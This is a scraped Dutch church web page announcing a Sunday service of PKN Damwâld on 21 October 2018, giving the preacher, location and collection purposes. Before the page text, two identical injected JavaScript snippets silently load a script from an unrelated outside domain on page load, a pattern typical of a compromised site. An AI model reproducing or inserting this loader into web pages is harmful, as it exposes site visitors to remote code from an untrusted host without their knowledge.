;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 21 oktober 2018 9:30 uur - PKN Damwâld
zondag 21 oktober 2018
09:30 uur

Kerkdienst zondag 21 oktober 2018 9:30 uur

Informatie

Voorganger:Ds. A.J. van der Wiel, Leeuwarden
Locatie: de Ontmoeting Foarwei 38, 9104 BX Damwâld
Collecte informatie
Tweede collecte: Kerk, eigen middelen
Uitganscollecte: Onderhoud en inventaris